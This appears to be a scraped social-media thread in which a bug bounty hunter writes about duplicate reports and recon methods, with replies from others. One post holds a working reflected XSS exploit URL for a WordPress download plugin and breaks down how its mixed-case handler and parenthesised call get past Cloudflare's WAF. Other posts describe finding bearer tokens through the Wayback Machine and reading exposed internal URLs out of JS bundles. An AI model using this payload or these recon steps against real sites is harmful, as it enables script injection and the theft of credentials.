Owl.exe

Wayback machine can help you see internal documents that are restricted. #Bug

@trace37_labs nice

Part 3 — Cloudflare WAF Bypass oNlY=1 oNeRrOr=(alert)(document.domain) -- oNlY=1 — junk attribute, breaks pattern matching -- oNeRrOr — mixed case evades signature detection -- (alert)(document.domain) — parenthesized call evades function-name matching What fires in the browser: html No auth. No CSP. Cloudflare watching quietly.

Just submitted an elegant reflected XSS via 3-part CVE chain + Cloudflare WAF bypass. Full payload breakdown 🧵: The full URL: https://[REDACTED]/?__wpdmxp=%27%5D%5B/wpdm_package%5D%5Bwpdm_user_dashboard%5D%5Bwpdm_package%20id=%27&redirect_to=%26quot;%3E%3CiMg%20sRc=x%20oNlY=1%20oNeRrOr=(alert)(document.domain)%3E The payload appears in HTML as...

@ide9x That led HashiCorp vault subdomain discovery throught that process. Which found to be vulnerable to xss.

@datafuel0 informative

reading JS: I found Internal API base URL , services URLs, Feature flags, Company IDs. It is REACT_APP_ * env. Intentionally baked into frontend. But guess what? It exposes secret internal HashiCorp vault (f**t**k*x) subdomain. It is used to store. Db-keys, encry-keys, s-t-s😎

@xofin904 Message me on telegram. t.me/thierry054

@datafuel0 i needbyour help hpw you do it pla ?

@x0_abdo Thank you man.

@datafuel0 Nice! Respect for reporting it properly. Stay safe out there man 👏

Hardcoded API Signing Credentials Exposed in Client-Side JavaScript Bundle🔥🔥

@x0_abdo Yeah man reported already.

@datafuel0 @datafuel0 Nice catch 👌 Hardcoded user+pass in JS bundle for OAuth signing = instant P1 if still live. Reported?

@7lpu6iLt This is the wild side of bugbounty.

I'm getting sick of this can't you guys just fix the issue already and stop letting us waste our time on duplicates. cause it says here that the first researcher submitted on jan 22 before i submitted mine today, this should be fixed already at least it's 3 months already

@7lpu6iLt Thank you man. how you also get valid reports soon.

@datafuel0 All my reports this months are dupes got me thinking like it’s a scam lol I feel you bro👌

I feel like I am going to Pause #bugbounty for at list some moths and come back. I will also quite social media in that period. I know it is not only me getting duplicate, but on my side; getting multiple duplicates with CVSS of 9.0+ is wild. I think will be back stronger. END

@EvanKlein338226 Thank you man.

@datafuel0 Dupes on high-severity bugs are brutal. Weirdly, sometimes the break makes you sharper - fresh eyes catch patterns you were too deep in the weeds to see. Come back swinging 🔥

@BugBountyCenter Thank you

Duplicates on high CVSS bugs hit different, I feel you. That said, taking a break is honestly one of the best moves you can make. Step away, recharge, maybe study some new attack surfaces or dig into less explored tech stacks while you're off the grind. When you come back you'll have fresh eyes and probably a totally different approach. The hunters who last in this game are the ones who know when to pull back. See you when you're back

@jardimvmj thank you bro

@datafuel0 You’re hunting in a ground already tested. Either you move to a fresher program or you improve your recon to find hidden assets

@Lrving888 Thank you for kind words.

@datafuel0 Everything will be fine.

Bro how do you recover from #Duplicates Depression In bugbounty? I have got so many Duplicates. The frustrating part is that the CVSS score is always 9.0+ man, I feel really down; I havent posted in past 12 days. I was just rethinking what i am doing wrong?.💔

@mohamed46742462 Thank you bro.

@datafuel0 Stay hard , keep going, I get 13 not applicable before first p2 keep going

These people waited for 12 days just to mark it as duplictate.💔

This AWS SOC Report. I got it and used it for my recon on a website😃

The Data Flow Where XSS Lives: [User Input] --> [API Request] --> [Backend] --> [JSON Response] --> [Frontend JS] --> [DOM Insertion] User input is stored by the backend and returned to the frontend. If rendered unsafely, it can execute as XSS.

@xofin904 Have my telegram t.me/occuploit

@datafuel0 I nees ro message you pls

Authentication bypass and information Diclosure. The bearer token is imbedded directly in URL. However, it is an authentication credential that can be exchanged on POST /api/authentication/login. I got this archived URL by using Wayback Machine CDX API with no authentication.